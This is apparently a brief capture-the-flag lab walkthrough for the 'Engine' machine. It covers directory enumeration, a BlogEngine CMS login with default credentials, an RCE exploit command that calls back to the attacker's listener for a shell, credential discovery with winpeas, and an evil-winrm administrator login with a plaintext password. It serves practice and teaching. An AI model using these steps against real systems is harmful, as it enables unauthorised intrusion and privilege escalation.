CyberSec Labs Engine Walkthrough
Port 80 open
Gobuster finds a directory /blog
It is blogengine cms which is not configured properly and has default creds admin:admin
There’s an RCE exploit available for the same
Python exploit.py –t 172.31.1.16/blog –l 10.10.0.51:920\
For the proxy we can turn burpsuit on and can send the payload through burpsuit.
After running the exploit we ge the shell back.
Running winpeas some autologin creds are found
Using evil-winrm we can get a admin shell
evil-winrm -u administrator -p “PzCEKhvj6gQMk7kA” -i 172.31.1.16
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami